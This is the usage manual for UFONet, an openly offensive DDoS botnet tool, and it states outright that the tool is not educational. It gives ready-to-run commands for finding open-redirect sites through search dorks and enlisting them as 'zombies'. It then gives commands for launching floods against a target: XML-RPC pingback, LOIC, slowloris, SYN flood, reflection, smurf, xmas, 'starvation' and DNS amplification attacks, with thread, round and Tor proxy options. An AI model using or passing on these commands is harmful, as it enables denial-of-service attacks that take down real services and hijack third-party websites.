[!]Remember: this tool is NOT for educational purpose.

Usage of UFONet for attacking targets without prior mutual consent is illegal.
It is the end user's responsibility to obey all applicable local, state and federal laws.
Developers assume no liability and are not responsible for any misuse or damage caused by this program.

FAQ:

If you have problems with UFONet, try to solve them following next links:
- Website FAQ section
- UFONet GitHub issues
Also you can stay in touch by reporting on my "mothership" (Board provided by default) [ +Zoom ].

Examples:

UFONet can dig on different search engines results to find possible 'Open Redirect' vulnerable sites.
A common query string should be like this:
'proxy.php?url='
'check.cgi?url='
'checklink?uri='
'validator?uri='
For example, you can begin a search with:
./ufonet -s 'proxy.php?url='
Or providing a list of "dorks" from a file:
./ufonet --sd 'botnet/dorks.txt'
By default UFONet will use a search engine called 'StartPage'. But you can choose a different one:
./ufonet -s 'proxy.php?url=' --se 'bing'
This is the list of available search engines with last time that they were working:
- startpage [03/06/2019: OK!]
- duckduckgo [03/06/2019: OK!]
- bing [03/06/2019: OK!]
- yahoo [03/06/2019: OK!]
You can also search massively using all search engines supported:
./ufonet -s 'proxy.php?url=' --sa
To control how many 'zombies' recieved from the search engines reports you can use:
./ufonet --sd 'botnet/dorks.txt' --sa --sn 20
Or you can make the tool to search for the maximun number of results automatically (this may take time!):
./ufonet --auto-search
At the end of the process, you will be asked if you want to check the list retrieved to see
if the urls are vulnerable.
Want to check if they are valid zombies? (Y/n)
Also, you will be asked to update the list adding automatically only the 'vulnerable' web apps.
Want to update your list? (Y/n)
If your answer is 'Y', your new 'zombies' will be appended to the file named: zombies.txt
-------------
Examples:
+ with verbose: ./ufonet -s 'proxy.php?url=' -v
+ with threads: ./ufonet --sd 'botnet/dorks.txt' --sa --threads 100

Testing botnet:

UFONet can test if your 'zombies' are vulnerable and can be used for attacking tasks.
For example, open 'botnet/zombies.txt' (or another file) and create a list of possible 'zombies'.
Remember that urls of the 'zombies' should be like this:
http://target.com/check?uri=
After that, launch:
./ufonet -t 'botnet/zombies.txt'
You can test for XML-RPC Pingback vulnerability related 'zombies', with:
./ufonet --test-rpc
To check if your 'zombies' are still infected testing the whole botnet (this may take time!) try this:
./ufonet --test-all
And to check if your 'zombies' are still online run:
./ufonet --test-offline
Finally, you can order your 'zombies' to attack you and see how they reply to your needs using:
./ufonet --attack-me
At the end of the process, you will be asked if you want to check the list retrieved to see
if the urls are vulnerable.
Want to check if they are valid zombies? (Y/n)
If your answer is 'Y', the file: "botnet/zombies.txt" will be updated.
-------------
Examples:
+ with verbose: ./ufonet -t 'botnet/zombies.txt' -v
+ with proxy TOR: ./ufonet -t 'botnet/zombies.txt' --proxy="http://127.0.0.1:8118"
+ with threads: ./ufonet -t 'botnet/zombies.txt' --threads 50
+ test whole botnet: ./ufonet --test-all
+ test XML-RPCs: ./ufonet --test-rpc
+ search for offlines: ./ufonet --test-offline
+ attack yourself: ./ufonet --attack-me

UFONet can attack your target in many different ways.
For example, enter a target to attack with a number of rounds:
./ufonet -a http://target.com -r 10
On this example UFONet will attack the target a number of 10 times for each 'zombie'. That means that
if you have a list of 1.000 'zombies' it will launch:
1.000 'zombies' x 10 rounds = 10.000 requests
If you don't put any round it will apply only 1 by default.
Additionally, you can choose a place to recharge on target's site. For example, a large image,
a big size file or a flash movie. In some scenarios where targets doesn't use cache systems
this will make the attack more effective.
./ufonet -a http://target.com -b "/images/big_size_image.jpg"
-------------
Examples:
+ with verbose: ./ufonet -a http://target.com -r 10 -v
+ with proxy TOR: ./ufonet -a http://target.com -r 10 --proxy="http://127.0.0.1:8118"
+ with a place: ./ufonet -a http://target.com -r 10 -b "/images/big_size_image.jpg"
+ with threads: ./ufonet -a http://target.com -r 10 --threads 500

Special attacks:

You can use UFONet to stress database on target by requesting random valid strings as search queries:
./ufonet -a http://target.com --db "search.php?q="
Also, it exploits (by default) XML-RPC Pingback Vulnerability, generating callback requests and increasing
processing required by target.
You can test your list of 'XML-RPCs zombies' launching:
./ufonet --test-rpc
At same time, you can connect LOIC (with proxy support), to make a determinate number of recursive requests
directly to your target:
./ufonet -a http://target.com --loic 100
You can connect LORIS to make requests leave open threads on the target too, making the web server
work slower:
./ufonet -a http://target.com --loris 100
And you can connect UFOSYN (it requires 'root' access) to start a powerful TCP/SYN flood attack:
sudo ./ufonet -a http://target.com --ufosyn 100
Or make a SPRAY ('root' required) attack to launch a Distributed 'Reflection' Denial of Service (DrDoS):
sudo ./ufonet -a http://target.com --spray 100
A SMURF ('root' required) attack to send Distributed ICMP 'Broadcast' packets:
sudo ./ufonet -a http://target.com --smurf 101
Or a XMAS ('root' required) attack that will flood your target with 'Christmas Tree' packets
sudo ./ufonet -a http://target.com --xmas 101
A STARVATION attack ('root' required) that will knock down your target in seconds, if it does not have a
minimum level of protection:
sudo ./ufonet -a http://target.com --nuke 10000
Or a TACHYON ('root' required) attack to perform a distributed amplification of DNS traffic:
sudo ./ufonet -a http://target.com --tachyon 1000
All ways could be combined, so UFONet can attack DDoS and DoS, at the same time.

Updating:

UFONet implements an option to update the tool to the latest stable version.
This feature can be used only if you have cloned it from a git respository.

GUI:

You can manage UFONet using a Web interface. The tool has implemented a python web server
connected to the core, to provides you a more user friendly experience.
To launch it, use:
./ufonet --gui
This will open a tab on your default browser with all features of the tool and some 'extra' options: